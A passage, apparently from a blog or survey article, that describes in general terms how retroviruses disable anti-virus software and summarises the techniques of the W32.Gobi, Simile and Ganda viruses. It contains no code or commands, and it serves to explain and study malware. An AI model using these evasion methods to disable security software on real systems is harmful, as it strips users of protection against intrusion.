Retroviruses try to disable the anti-virus software. They do this by carrying a list of process names and killing the processes the program finds running. Many retroviruses also take the process off of the startup list so the process no longer starts when the computer boots. This type of malware may also try to starve the anti-virus software of CPU time or prevent the anti-virus software from connecting to the company’s servers to update its database [1].
5. Combining Techniques
The W32.Gobi virus is a polymorphic retrovirus that uses EPO and several anti-debugging techniques. This virus opens a backdoor on TCP port 666 [8]
Simile (also known as Metaphor) is a very well known and complex virus that is approximately 14,000 lines of assembly [9]. This virus uses EPO by looking for the ExitProcess() API call. It is also a metamorphic virus that uses polymorphic decryption [1]. About 90% of its code is spent on the polymorphic decryption. The virus body and polymorphic decryptor are placed in a semi-random place in a newly infected file each time. The first payload of Simile only activates during March, June, September or December. Variants A and B display their message on the 17th of these months. Variant C displays its message on the 18th. The second payload activates on the 14th of May in variants A and B and on the 14th of July in variant C [9].
Ganda is a retrovirus that uses EPO. It examines the list of startup processes and replaces the first instruction of each startup process with a return. This renders any antivirus programs useless [1].
Subscribe to:
Posts (Atom)